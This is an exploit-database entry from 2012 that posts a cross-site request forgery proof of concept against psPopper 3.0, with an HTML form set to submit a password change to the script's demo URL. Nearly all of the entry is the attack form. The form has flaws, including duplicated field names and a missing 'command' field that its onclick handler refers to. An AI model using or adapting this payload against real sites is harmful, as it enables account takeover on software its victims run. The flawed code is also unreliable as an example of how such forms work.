psPopper 3.0 CSRF (change password)



EKU-ID: 1646 CVE: OSVDB-ID:
Author: Jonturk75 Published: 2012-03-13 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: psPopper  3.0 CSRF (change password)
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/pspopper-popup-window-controller/6788/
# Category::  webapps
# Demo : http://www.cgiscript.net/demo/psPopper/psPopper.php
# Greetz: Inj3ct0r Exploit DataBase 1337day.com


<form action="http://www.cgiscript.net/demo/psPopper/psPopper.php" method="POST" name="form1">
<input type="hidden" name="new password" class="text"/></td>
<input type="hidden" name="new password" class="text"/></td>
<input type="button" onclick="document.form1.command.value='cp';document.form1.submit();" value="Save Username/Password" onmouseout="className='button';" 
onmouseover="className='buttonOver';" class="button"/>
</form>